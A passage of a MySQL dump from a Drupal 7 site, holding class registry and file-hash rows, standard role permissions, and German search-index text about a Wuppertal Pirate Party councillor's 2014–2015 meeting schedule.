earchNumbersTestCase','class','modules/search/search.test','search',0),('SearchPageOverride','class','modules/search/search.test','search',0),('SearchPageText','class','modules/search/search.test','search',0),('SearchQuery','class','modules/search/search.extender.inc','search',0),('SearchRankingTestCase','class','modules/search/search.test','search',0),('SearchSetLocaleTest','class','modules/search/search.test','search',0),('SearchSimplifyTestCase','class','modules/search/search.test','search',0),('SearchTokenizerTestCase','class','modules/search/search.test','search',0),('SelectQuery','class','includes/database/select.inc','',0),('SelectQueryExtender','class','includes/database/select.inc','',0),('SelectQueryInterface','interface','includes/database/select.inc','',0),('SelectQuery_pgsql','class','includes/database/pgsql/select.inc','',0),('SelectQuery_sqlite','class','includes/database/sqlite/select.inc','',0),('ShortcutLinksTestCase','class','modules/shortcut/shortcut.test','shortcut',0),('ShortcutSetsTestCase','class','modules/shortcut/shortcut.test','shortcut',0),('ShortcutTestCase','class','modules/shortcut/shortcut.test','shortcut',0),('ShutdownFunctionsTest','class','modules/system/system.test','system',0),('SiteMaintenanceTestCase','class','modules/system/system.test','system',0),('SkipDotsRecursiveDirectoryIterator','class','includes/filetransfer/filetransfer.inc','',0),('StatisticsAdminTestCase','class','modules/statistics/statistics.test','statistics',0),('StatisticsBlockVisitorsTestCase','class','modules/statistics/statistics.test','statistics',0),('StatisticsLoggingTestCase','class','modules/statistics/statistics.test','statistics',0),('StatisticsReportsTestCase','class','modules/statistics/statistics.test','statistics',0),('StatisticsTestCase','class','modules/statistics/statistics.test','statistics',0),('StatisticsTokenReplaceTestCase','class','modules/statistics/statistics.test','statistics',0),('StreamWrapperInterface','interface','includes/stream_wrappers.inc','',0),('SummaryLengthTestCase','class','modules/node/node.test','node',0),('SystemAdminTestCase','class','modules/system/system.test','system',0),('SystemAuthorizeCase','class','modules/system/system.test','system',0),('SystemBlockTestCase','class','modules/system/system.test','system',0),('SystemIndexPhpTest','class','modules/system/system.test','system',0),('SystemInfoAlterTestCase','class','modules/system/system.test','system',0),('SystemMainContentFallback','class','modules/system/system.test','system',0),('SystemQueue','class','modules/system/system.queue.inc','system',0),('SystemThemeFunctionalTest','class','modules/system/system.test','system',0),('SystemValidTokenTest','class','modules/system/system.test','system',0),('TableSort','class','includes/tablesort.inc','',0),('TaxonomyEFQTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyHooksTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyLegacyTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyLoadMultipleTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyRSSTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyTermController','class','modules/taxonomy/taxonomy.module','taxonomy',0),('TaxonomyTermFieldMultipleVocabularyTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyTermFieldTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyTermFunctionTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyTermIndexTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyTermTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyThemeTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyTokenReplaceTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyVocabularyController','class','modules/taxonomy/taxonomy.module','taxonomy',0),('TaxonomyVocabularyFunctionalTest','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyVocabularyTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TaxonomyWebTestCase','class','modules/taxonomy/taxonomy.test','taxonomy',0),('TestingMailSystem','class','modules/system/system.mail.inc','system',0),('TextFieldTestCase','class','modules/field/modules/text/text.test','text',0),('TextSummaryTestCase','class','modules/field/modules/text/text.test','text',0),('TextTranslationTestCase','class','modules/field/modules/text/text.test','text',0),('ThemeRegistry','class','includes/theme.inc','',0),('ThemeUpdater','class','modules/system/system.updater.inc','system',0),('TokenReplaceTestCase','class','modules/system/system.test','system',0),('TokenScanTest','class','modules/system/system.test','system',0),('TruncateQuery','class','includes/database/query.inc','',0),('TruncateQuery_mysql','class','includes/database/mysql/query.inc','',0),('TruncateQuery_sqlite','class','includes/database/sqlite/query.inc','',0),('UpdateCoreTestCase','class','modules/update/update.test','update',0),('UpdateCoreUnitTestCase','class','modules/update/update.test','update',0),('UpdateQuery','class','includes/database/query.inc','',0),('UpdateQuery_pgsql','class','includes/database/pgsql/query.inc','',0),('UpdateQuery_sqlite','class','includes/database/sqlite/query.inc','',0),('Updater','class','includes/updater.inc','',0),('UpdaterException','class','includes/updater.inc','',0),('UpdaterFileTransferException','class','includes/updater.inc','',0),('UpdateScriptFunctionalTest','class','modules/system/system.test','system',0),('UpdateTestContribCase','class','modules/update/update.test','update',0),('UpdateTestHelper','class','modules/update/update.test','update',0),('UpdateTestUploadCase','class','modules/update/update.test','update',0),('UserAccountLinksUnitTests','class','modules/user/user.test','user',0),('UserAdminTestCase','class','modules/user/user.test','user',0),('UserAuthmapAssignmentTestCase','class','modules/user/user.test','user',0),('UserAutocompleteTestCase','class','modules/user/user.test','user',0),('UserBlocksUnitTests','class','modules/user/user.test','user',0),('UserCancelTestCase','class','modules/user/user.test','user',0),('UserController','class','modules/user/user.module','user',0),('UserCreateTestCase','class','modules/user/user.test','user',0),('UserEditedOwnAccountTestCase','class','modules/user/user.test','user',0),('UserEditTestCase','class','modules/user/user.test','user',0),('UserLoginTestCase','class','modules/user/user.test','user',0),('UserPasswordResetTestCase','class','modules/user/user.test','user',0),('UserPermissionsTestCase','class','modules/user/user.test','user',0),('UserPictureTestCase','class','modules/user/user.test','user',0),('UserRegistrationTestCase','class','modules/user/user.test','user',0),('UserRoleAdminTestCase','class','modules/user/user.test','user',0),('UserRolesAssignmentTestCase','class','modules/user/user.test','user',0),('UserSaveTestCase','class','modules/user/user.test','user',0),('UserSignatureTestCase','class','modules/user/user.test','user',0),('UserTimeZoneFunctionalTest','class','modules/user/user.test','user',0),('UserTokenReplaceTestCase','class','modules/user/user.test','user',0),('UserUserSearchTestCase','class','modules/user/user.test','user',0),('UserValidateCurrentPassCustomForm','class','modules/user/user.test','user',0),('UserValidationTestCase','class','modules/user/user.test','user',0); /*!40000 ALTER TABLE `registry` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `registry_file` -- DROP TABLE IF EXISTS `registry_file`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `registry_file` ( `filename` varchar(255) NOT NULL COMMENT 'Path to the file.', `hash` varchar(64) NOT NULL COMMENT 'sha-256 hash of the file’s contents when last parsed.', PRIMARY KEY (`filename`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Files parsed to build the registry.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `registry_file` -- LOCK TABLES `registry_file` WRITE; /*!40000 ALTER TABLE `registry_file` DISABLE KEYS */; INSERT INTO `registry_file` VALUES ('includes/actions.inc','f36b066681463c7dfe189e0430cb1a89bf66f7e228cbb53cdfcd93987193f759'),('includes/ajax.inc','a22c8f7345c1f714ea40bbaa1385fa0e3763b389c82656cf6ff3e4d051532ee4'),('includes/archiver.inc','bdbb21b712a62f6b913590b609fd17cd9f3c3b77c0d21f68e71a78427ed2e3e9'),('includes/authorize.inc','6d64d8c21aa01eb12fc29918732e4df6b871ed06e5d41373cb95c197ed661d13'),('includes/batch.inc','1fe00f9a25481cd43e19fbd6bd37b7ff9dca79f8405ec3e55ffb011be12ec2c3'),('includes/batch.queue.inc','554b2e92e1dad0f7fd5a19cb8dff7e109f10fbe2441a5692d076338ec908de0f'),('includes/bootstrap.inc','245deaa370fa492dae401e2eee215f771f9ffbba14c1ff50631a6a4b2b3c771e'),('includes/cache-install.inc','e7ed123c5805703c84ad2cce9c1ca46b3ce8caeeea0d8ef39a3024a4ab95fa0e'),('includes/cache.inc','ee0bf13c7e067695dffcb9ade3b79fea82a3a8db9e9a422ebfcc91c383aa4b4c'),('includes/common.inc','d64557e1027136d80e66c329133336412c8301b48c6703943494cff1309f934c'),('includes/database/database.inc','27f874fb21e1a85c86e0317669e2e26c1c6611a5e913c5bbce4c7aa62734edfe'),('includes/database/log.inc','9feb5a17ae2fabcf26a96d2a634ba73da501f7bcfc3599a693d916a6971d00d1'),('includes/database/mysql/database.inc','f021edd0e2b5e315336eb6b5e481b9516c12de78dff2c468be3d7fd0d3672665'),('includes/database/mysql/install.inc','6ae316941f771732fbbabed7e1d6b4cbb41b1f429dd097d04b3345aa15e461a0'),('includes/database/mysql/query.inc','0212a871646c223bf77aa26b945c77a8974855373967b5fb9fdc09f8a1de88a6'),('includes/database/mysql/schema.inc','6f43ac87508f868fe38ee09994fc18d69915bada0237f8ac3b717cafe8f22c6b'),('includes/database/pgsql/database.inc','d737f95947d78eb801e8ec8ca8b01e72d2e305924efce8abca0a98c1b5264cff'),('includes/database/pgsql/install.inc','585b80c5bbd6f134bff60d06397f15154657a577d4da8d1b181858905f09dea5'),('includes/database/pgsql/query.inc','0df57377686c921e722a10b49d5e433b131176c8059a4ace4680964206fc14b4'),('includes/database/pgsql/schema.inc','1588daadfa53506aa1f5d94572162a45a46dc3ceabdd0e2f224532ded6508403'),('includes/database/pgsql/select.inc','fd4bba7887c1dc6abc8f080fc3a76c01d92ea085434e355dc1ecb50d8743c22d'),('includes/database/prefetch.inc','b5b207a66a69ecb52ee4f4459af16a7b5eabedc87254245f37cc33bebb61c0fb'),('includes/database/query.inc','4016a397f10f071cac338fd0a9b004296106e42ab2b9db8c7ff0db341658e88f'),('includes/database/schema.inc','9fecfd13fc1d4056a62d385840dccd052ea0e184dc47101f4bd8f57f10b68174'),('includes/database/select.inc','5e9cdc383564ba86cb9dcad0046990ce15415a3000e4f617d6e0f30a205b852c'),('includes/database/sqlite/database.inc','4281c6e80932560ecbeb07d1757efd133e8699a6fccf58c27a55df0f71794622'),('includes/database/sqlite/install.inc','6620f354aa175a116ba3a0562c980d86cc3b8b481042fc3cc5ed6a4d1a7a6d74'),('includes/database/sqlite/query.inc','f33ab1b6350736a231a4f3f93012d3aac4431ac4e5510fb3a015a5aa6cab8303'),('includes/database/sqlite/schema.inc','cd829700205a8574f8b9d88cd1eaf909519c64754c6f84d6c62b5d21f5886f8d'),('includes/database/sqlite/select.inc','8d1c426dbd337733c206cce9f59a172546c6ed856d8ef3f1c7bef05a16f7bf68'),('includes/date.inc','18c047be64f201e16d189f1cc47ed9dcf0a145151b1ee187e90511b24e5d2b36'),('includes/entity.inc','e4fc9ff21b165a804d7ac4f036b3b5bd1d3c73da7029bf3f761d4bdee9ae3c96'),('includes/errors.inc','72cc29840b24830df98a5628286b4d82738f2abbb78e69b4980310ff12062668'),('includes/file.inc','9de0398940bf2db560902736f1832d8b72b3e8b49dbbaba5f94c9331425ee04a'),('includes/file.mimetypes.inc','33266e837f4ce076378e7e8cef6c5af46446226ca4259f83e13f605856a7f147'),('includes/filetransfer/filetransfer.inc','fdea8ae48345ec91885ac48a9bc53daf87616271472bb7c29b7e3ce219b22034'),('includes/filetransfer/ftp.inc','51eb119b8e1221d598ffa6cc46c8a322aa77b49a3d8879f7fb38b7221cf7e06d'),('includes/filetransfer/local.inc','7cbfdb46abbdf539640db27e66fb30e5265128f31002bd0dfc3af16ae01a9492'),('includes/filetransfer/ssh.inc','92f1232158cb32ab04cbc93ae38ad3af04796e18f66910a9bc5ca8e437f06891'),('includes/form.inc','9b37fe7e5d04b25604bbc63abb6b6d332be14926011533b4449de52d45a86765'),('includes/graph.inc','8e0e313a8bb33488f371df11fc1b58d7cf80099b886cd1003871e2c896d1b536'),('includes/image.inc','bcdc7e1599c02227502b9d0fe36eeb2b529b130a392bc709eb737647bd361826'),('includes/install.core.inc','733ec6fac8e51747d1c83f266a42e4a0cb6bf31ac50f17f06e37c9e0865f4a38'),('includes/install.inc','781c54771c14b067bb38d222096f981121d479222fbdea9c433405de561a2881'),('includes/iso.inc','0ce4c225edcfa9f037703bc7dd09d4e268a69bcc90e55da0a3f04c502bd2f349'),('includes/json-encode.inc','02a822a652d00151f79db9aa9e171c310b69b93a12f549bc2ce00533a8efa14e'),('includes/language.inc','4e08f30843a7ccaeea5c041083e9f77d33d57ff002f1ab4f66168e2c683ce128'),('includes/locale.inc','f8a3ba7868698e9b43c2ceaebe2cbdcb92d6c68427e817a6e10a76b937b5a127'),('includes/lock.inc','a181c8bd4f88d292a0a73b9f1fbd727e3314f66ec3631f288e6b9a54ba2b70fa'),('includes/mail.inc','d9fb2b99025745cbb73ebcfc7ac12df100508b9273ce35c433deacf12dd6a13a'),('includes/menu.inc','2ecc6f990dc2d987425c680e27a4ddeec2e8376a2be408b00a144131f41a59ea'),('includes/module.inc','a18bc92e5fc1f2a31a79eace8c6f2436bc15c8f0b332c8b7aaafa3a223746861'),('includes/pager.inc','6f9494b85c07a2cc3be4e54aff2d2757485238c476a7da084d25bde1d88be6d8'),('includes/password.inc','fd9a1c94fe5a0fa7c7049a2435c7280b1d666b2074595010e3c492dd15712775'),('includes/path.inc','74bf05f3c68b0218730abf3e539fcf08b271959c8f4611940d05124f34a6a66f'),('includes/registry.inc','f47b20859f0fc80bf4bb2849a1282d6c54006957b69da0e5f4691de585ca4cdf'),('includes/session.inc','7548621ae4c273179a76eba41aa58b740100613bc015ad388a5c30132b61e34b'),('includes/stream_wrappers.inc','4f1feb774a8dbc04ca382fa052f59e58039c7261625f3df29987d6b31f08d92d'),('includes/tablesort.inc','2d88768a544829595dd6cda2a5eb008bedb730f36bba6dfe005d9ddd999d5c0f'),('includes/theme.inc','507932af124871dd2639ab8eafbbd68f962ef70f44ef1c4fd1a14daf04c53b5e'),('includes/theme.maintenance.inc','39f068b3eee4d10a90d6aa3c86db587b6d25844c2919d418d34d133cfe330f5a'),('includes/token.inc','5e7898cd78689e2c291ed3cd8f41c032075656896f1db57e49217aac19ae0428'),('includes/unicode.entities.inc','2b858138596d961fbaa4c6e3986e409921df7f76b6ee1b109c4af5970f1e0f54'),('includes/unicode.inc','e18772dafe0f80eb139fcfc582fef1704ba9f730647057d4f4841d6a6e4066ca'),('includes/update.inc','77403195059de797422d9d9202f18548a38558995120c7f9ffb9bd044730a3bc'),('includes/updater.inc','d2da0e74ed86e93c209f16069f3d32e1a134ceb6c06a0044f78e841a1b54e380'),('includes/utility.inc','3458fd2b55ab004dd0cc529b8e58af12916e8bd36653b072bdd820b26b907ed5'),('includes/xmlrpc.inc','ea24176ec445c440ba0c825fc7b04a31b440288df8ef02081560dc418e34e659'),('includes/xmlrpcs.inc','741aa8d6fcc6c45a9409064f52351f7999b7c702d73def8da44de2567946598a'),('modules/block/block.test','40d9de00589211770a85c47d38c8ad61c598ec65d9332128a882eb8750e65a16'),('modules/blog/blog.test','f7534b972951c05d34bd832d3e06176b372fff6f4999c428f789fdd7703ed2e2'),('modules/color/color.test','013806279bd47ceb2f82ca854b57f880ba21058f7a2592c422afae881a7f5d15'),('modules/comment/comment.module','db858137ff6ce06d87cb3b8f5275bed90c33a6d9aa7d46e7a74524cc2f052309'),('modules/comment/comment.test','0443a4dbc5aef3d64405a7cabf462c8c5e0b24517d89410d261027b85292cd4b'),('modules/contact/contact.test','d49eedd71859fbb6ffa26b87226f640db56694c8f43c863c83d920cf3632f9ad'),('modules/contextual/contextual.test','023dafa199bd325ecc55a17b2a3db46ac0a31e23059f701f789f3bc42427ba0b'),('modules/dashboard/dashboard.test','125df00fc6deb985dc554aa7807a48e60a68dbbddbad9ec2c4718da724f0e683'),('modules/dblog/dblog.test','11fbb8522b1c9dc7c85edba3aed7308a8891f26fc7292008822bea1b54722912'),('modules/field/field.attach.inc','2df4687b5ec078c4893dc1fea514f67524fd5293de717b9e05caf977e5ae2327'),('modules/field/field.info.class.inc','cf18178e119d43897d3abd882ba3acc0cf59d1ad747663437c57b1ec4d0a4322'),('modules/field/field.module','e9359f8cac64b2d81ac067d7da22972116dc10b9b346752a8ef8292943a958c9'),('modules/field/modules/field_sql_storage/field_sql_storage.test','315eedaf2022afc884c35efd3b7c400eddab6ea30bec91924bc82ab5cd3e79f2'),('modules/field/modules/list/tests/list.test','97e55bd49f6f4b0562d04aa3773b5ab9b35063aee05c8c7231780cdcf9c97714'),('modules/field/modules/number/number.test','9ccf835bbf80ff31b121286f6fbcf59cc42b622a51ab56b22362b2f55c656e18'),('modules/field/modules/options/options.test','c71441020206b1587dece7296cca306a9f0fbd6e8f04dae272efc15ed3a38383'),('modules/field/modules/text/text.test','a1e5cb0fa8c0651c68d560d9bb7781463a84200f701b00b6e797a9ca792a7e42'),('modules/field/tests/field.test','5eaad7a933ef8ea05b958056492ce17858cd542111f0fe81dd1a5949ad8f966e'),('modules/field_ui/field_ui.test','ded58a83a37cf111834f68fde9c34cddc7f4d36b91f31281e41ed5220c65dac4'),('modules/file/tests/file.test','51d79794cbe647b2f5635ca9193b4d63bb9f99db4d9074676a80c55582b02985'),('modules/filter/filter.test','268488be9d8e6a4bfa906bbb5bbf1f0df5881c04a421cbefcd7aa4f05fb63ba0'),('modules/help/help.test','bc934de8c71bd9874a05ccb5e8f927f4c227b3b2397d739e8504c8fd6ae5a83c'),('modules/image/image.test','19459f5be2fb58058a984ef302d6f6defca20207324db25726d06a7743cc2960'),('modules/menu/menu.test','51817d6c591c28cf268145c2d39b41f66e453edf42c86472e61b7081da1d86bb'),('modules/node/node.module','b594aa316e7d74024d633fb95a6e89a2c6c14cb108a481fd0b2521ec0e3316de'),('modules/node/node.test','e2e485fde00796305fd6926c8b4e9c4e1919020a3ec00819aa5cc1d2b3ebcc5c'),('modules/path/path.test','2004183b2c7c86028bf78c519c6a7afc4397a8267874462b0c2b49b0f8c20322'),('modules/php/php.test','d234f9c1ab18a05834a3cb6dc532fb4c259aa25612551f953ba6e3bb714657b8'),('modules/rdf/rdf.test','9849d2b717119aa6b5f1496929e7ac7c9c0a6e98486b66f3876bda0a8c165525'),('modules/search/search.extender.inc','013a6a841cc48a6dc991153fb692b8d1546e56b78d9c95e97e0d7e92296d3481'),('modules/search/search.test','6512521f8de3a54238c8f337ae0aa105cab2bbc9a1addb5b1ccb755842656913'),('modules/shortcut/shortcut.test','0d78280d4d0a05aa772218e45911552e39611ca9c258b9dd436307914ac3f254'),('modules/statistics/statistics.test','3fd921d3cc26f9363bba0d6f29efb96c49c88ca51e2e2376b6554afaff8ceeb5'),('modules/system/system.archiver.inc','faa849f3e646a910ab82fd6c8bbf0a4e6b8c60725d7ba81ec0556bd716616cd1'),('modules/system/system.mail.inc','d31e1769f5defbe5f27dc68f641ab80fb8d3de92f6e895f4c654ec05fc7e5f0f'),('modules/system/system.queue.inc','a60cff401fc410cd81dc1d105ed66f79396ed7b15fdc3a5c5b80593ad5d4352a'),('modules/system/system.tar.inc','8a31d91f7b3cd7eac25b3fa46e1ed9a8527c39718ba76c3f8c0bbbeaa3aa4086'),('modules/system/system.test','b53fdc9f28a49d9bdd819721a6bc4ae0e8a7b023a415e98672a99453187c1f1e'),('modules/system/system.updater.inc','338cf14cb691ba16ee551b3b9e0fa4f579a2f25c964130658236726d17563b6a'),('modules/taxonomy/taxonomy.module','45d6d5652a464318f3eccf8bad6220cc5784e7ffdb0c7b732bf4d540e1effe83'),('modules/taxonomy/taxonomy.test','8525035816906e327ad48bd48bb071597f4c58368a692bcec401299a86699e6e'),('modules/update/update.test','1ea3e22bd4d47afb8b2799057cdbdfbb57ce09013d9d5f2de7e61ef9c2ebc72d'),('modules/user/user.module','88bb508e0eb658281b085cd07c81808bd9634bba8a2271515c1d68079d58817d'),('modules/user/user.test','178320fdb9a0c8754f1fa7272f68f536dcb94ae82ce7d0fc6a0f8a476c1f6922'),('sites/all/modules/adsense/adsense.admin.inc','4500c9bfc3286c50561d3193cc658eeec9887b3f77a8fb0a9a8d8b2b337e823f'),('sites/all/modules/adsense/adsense.install','b7771c05a21e54f5ae06ed1800fa43cdf49bced618af605793a83b0c7aeba07a'),('sites/all/modules/adsense/adsense.module','912d22c16b88541e16851f1c16d652af30810c04c86a843d386be11f8e96fca0'),('sites/all/modules/adsense/contrib/adsense_click/adsense_click.admin.inc','1c95ed6208e7da8d155171795ffd34f09d7ec1da0108cff1ad9351c380e81dd9'),('sites/all/modules/adsense/contrib/adsense_click/adsense_click.install','1bc806411f0b7a4ffc9db9da0f7339f575d46dc9a26620379e72c679c08fedfb'),('sites/all/modules/adsense/contrib/adsense_click/adsense_click.logs.inc','8353859efaf54d163ecca275bb9d129a91a9f7cd25e9baf4e43a3351bca0d635'),('sites/all/modules/adsense/contrib/adsense_click/adsense_click.module','a0664a39844f67518cd601800b14ea0991605d96bc197e61b3d792a18d0514f5'),('sites/all/modules/adsense/cse/adsense_cse.admin.inc','d7cc03ba0711698dc47536d4970665ba9389b507d5adb7a9053b2a238cc9aac5'),('sites/all/modules/adsense/cse/adsense_cse.install','54fba0fdfbaea0f4b4c9039c50be8f7ec3c44a183ea678279063822e5acf16f9'),('sites/all/modules/adsense/cse/adsense_cse.module','e5c9a1c960412310e34a5bea6f0f13c4c59c43a7fa844cbdd479e12aa7374a1b'),('sites/all/modules/adsense/cse/adsense_cse.results.inc','fbffe495442c1779fe46d5254e176f1c45e88f97b230af85744ee7e80e9bde8a'),('sites/all/modules/adsense/managed/adsense_managed.admin.inc','31504113fd7214fdc09a2b95f676a22a0a3c6164777bcf61f154d7e94128bca9'),('sites/all/modules/adsense/managed/adsense_managed.install','9d7ff7270b7efc76ebb1261012a79e54dee52e4cf45c2135d0f22d3e93fa3a25'),('sites/all/modules/adsense/managed/adsense_managed.module','96a6bbcf94270ec221eca6a371df322d6c3483474ba19ca5a9bdbdbec391182d'),('sites/all/modules/adsense/old/oldcode/adsense_oldcode.admin.inc','15d4742f5a9fa104853b514f8af0de0707be084a9771809d51ca58e33d9c8fb5'),('sites/all/modules/adsense/old/oldcode/adsense_oldcode.install','df1d931a56f64ba9bf8e8a717cd06a790ba3be2c8b35d8f00410c5137c376119'),('sites/all/modules/adsense/old/oldcode/adsense_oldcode.module','cdc5df20d34ef121fa0a4fd16bc3dffa8553da75c934a5faf45ee5402c6a1766'); /*!40000 ALTER TABLE `registry_file` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `role` -- DROP TABLE IF EXISTS `role`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `role` ( `rid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique role ID.', `name` varchar(64) NOT NULL DEFAULT '' COMMENT 'Unique role name.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The weight of this role in listings and the user interface.', PRIMARY KEY (`rid`), UNIQUE KEY `name` (`name`), KEY `name_weight` (`name`,`weight`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='Stores user roles.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `role` -- LOCK TABLES `role` WRITE; /*!40000 ALTER TABLE `role` DISABLE KEYS */; INSERT INTO `role` VALUES (3,'administrator',2),(1,'anonymous user',0),(2,'authenticated user',1); /*!40000 ALTER TABLE `role` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `role_permission` -- DROP TABLE IF EXISTS `role_permission`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `role_permission` ( `rid` int(10) unsigned NOT NULL COMMENT 'Foreign Key: role.rid.', `permission` varchar(128) NOT NULL DEFAULT '' COMMENT 'A single permission granted to the role identified by rid.', `module` varchar(255) NOT NULL DEFAULT '' COMMENT 'The module declaring the permission.', PRIMARY KEY (`rid`,`permission`), KEY `permission` (`permission`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores the permissions assigned to user roles.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `role_permission` -- LOCK TABLES `role_permission` WRITE; /*!40000 ALTER TABLE `role_permission` DISABLE KEYS */; INSERT INTO `role_permission` VALUES (1,'access comments','comment'),(1,'access content','node'),(1,'use text format filtered_html','filter'),(2,'access comments','comment'),(2,'access content','node'),(2,'post comments','comment'),(2,'skip comment approval','comment'),(2,'use text format filtered_html','filter'),(3,'access administration pages','system'),(3,'access comments','comment'),(3,'access content','node'),(3,'access content overview','node'),(3,'access contextual links','contextual'),(3,'access dashboard','dashboard'),(3,'access overlay','overlay'),(3,'access site in maintenance mode','system'),(3,'access site reports','system'),(3,'access site-wide contact form','contact'),(3,'access statistics','statistics'),(3,'access toolbar','toolbar'),(3,'access user contact forms','contact'),(3,'access user profiles','user'),(3,'administer actions','system'),(3,'administer adsense','adsense'),(3,'administer blocks','block'),(3,'administer comments','comment'),(3,'administer contact forms','contact'),(3,'administer content types','node'),(3,'administer filters','filter'),(3,'administer image styles','image'),(3,'administer menu','menu'),(3,'administer modules','system'),(3,'administer nodes','node'),(3,'administer permissions','user'),(3,'administer search','search'),(3,'administer shortcuts','shortcut'),(3,'administer site configuration','system'),(3,'administer software updates','system'),(3,'administer statistics','statistics'),(3,'administer taxonomy','taxonomy'),(3,'administer themes','system'),(3,'administer url aliases','path'),(3,'administer users','user'),(3,'block IP addresses','system'),(3,'bypass node access','node'),(3,'cancel account','user'),(3,'change own username','user'),(3,'create article content','node'),(3,'create page content','node'),(3,'create url aliases','path'),(3,'customize shortcut links','shortcut'),(3,'delete any article content','node'),(3,'delete any page content','node'),(3,'delete own article content','node'),(3,'delete own page content','node'),(3,'delete revisions','node'),(3,'delete terms in 1','taxonomy'),(3,'edit any article content','node'),(3,'edit any page content','node'),(3,'edit own article content','node'),(3,'edit own comments','comment'),(3,'edit own page content','node'),(3,'edit terms in 1','taxonomy'),(3,'hide adsense','adsense'),(3,'post comments','comment'),(3,'revert revisions','node'),(3,'search content','search'),(3,'select account cancellation method','user'),(3,'show adsense placeholders','adsense'),(3,'skip comment approval','comment'),(3,'switch shortcut sets','shortcut'),(3,'use advanced search','search'),(3,'use PHP for ad visibility','adsense'),(3,'use PHP for settings','php'),(3,'use text format filtered_html','filter'),(3,'use text format full_html','filter'),(3,'use text format php_code','filter'),(3,'view clicks','adsense_click'),(3,'view own unpublished content','node'),(3,'view post access counter','statistics'),(3,'view revisions','node'),(3,'view the administration theme','system'); /*!40000 ALTER TABLE `role_permission` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `search_dataset` -- DROP TABLE IF EXISTS `search_dataset`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `search_dataset` ( `sid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Search item ID, e.g. node ID for nodes.', `type` varchar(16) NOT NULL COMMENT 'Type of item, e.g. node.', `data` longtext NOT NULL COMMENT 'List of space-separated words from the item.', `reindex` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Set to force node reindexing.', PRIMARY KEY (`sid`,`type`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores items that will be searched.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `search_dataset` -- LOCK TABLES `search_dataset` WRITE; /*!40000 ALTER TABLE `search_dataset` DISABLE KEYS */; INSERT INTO `search_dataset` VALUES (3,'node',' allgemeines olli graf stadtverordneter im rat der stadt wuppertal mitglied im betriebsauschuss gebäudemanagement beratendes mitglied im auschuss für stadtentwicklung wirtschaft und bauen stawibau mitglied der piratenpartei mitglied der fraktion bündnis 90 die grünen ',0),(4,'node',' termine 21112014 tag der offenen tür aidshilfe wuppertal 23112014 kreismitgliederversammlung 26112014 ausschuss stadtentwicklung wirtschaft und bauen 26112014 bürgerbegehren gegen den verkauf des carnaper platzes 1122014 filmpremiere dokumentation stigma adhs zum thema adhs bei kindern 3122014 bv elberfeld 9122014 bv barmen 15122014 ratssitzung 19122014 offiz eröffnung der nordbahntrasse januar 11022015 wuppertal 30 24022015 bv barmen 25022015 bv elberfeld 18012015 neujahrsempfang bürgerverein langerfeld und förderverein der gesamtschule langerfeld 2801 2015 bv elberfeld februar 9022015 gemeinsame sondersitzung der ausschüsse finanzen stawibau und beteiligungssteuerung 10022015 ratssondersitzung märz 3032015 wuppertal 30 9032015 ratssitzung 25032015 wuppertal 30 26032015 sondersitzung stawibau 26032015 ratssondersitzung april 14042015 wuppertal 30 17042015 70 jahrestag der befreiung vom nationalsozialismus in wuppertal gedenkfeier und befreiungsfest 18042015 landesparteitag 20151 19042015 landesparteitag 20151 23042015 betriebsauschuss gebäudemanagement fällt aus 28042014 bv barmen 29042015 bv elberfeld 30042015 ausschuss stadtentwicklung wirtschaft und bauen mai 6052015 wuppertal 30 11052015 ratssitzung 13052015 beirat der menschen mit behinderung vetretung 19052015 auftaktveranstaltung seilbahnprojekt 20052015 diskussionsveranstaltung das solidarische bürgerticket 21052015 wuppertal 30 30052015 wuppertal 30 juni 4062015 barmen live 6062015 kommunales mandatsträgertreffen 9062015 bv barmen 10062015 bv elberfeld 11062015 ausschuss stadtentwicklung wirtschaft und bauen 11062015 ausstellung und gespräch seilbahnprojekt 13062015 freiheit statt angst demo düsseldorf 16062015 infotermin mit ausstellung seilbahnprojekt 16062015 podiumsdiskussion über ein bedingungsloses grundeinkommen 22062015 ratssitzung 24062015 infoveranstaltung ausbau l 419 29062015 beginn der sommerferien juli 23072015 sondersitzung stadtentwicklung wirtschaft und bauen 25072015 bundesparteitag 20151 26072015 bundesparteitag 20151 28072015 wahlausschuss für die oberbürgermeisterwahl am 13 september 2015 august 17082015 ratssitzung 20082015 betriebsauschuss 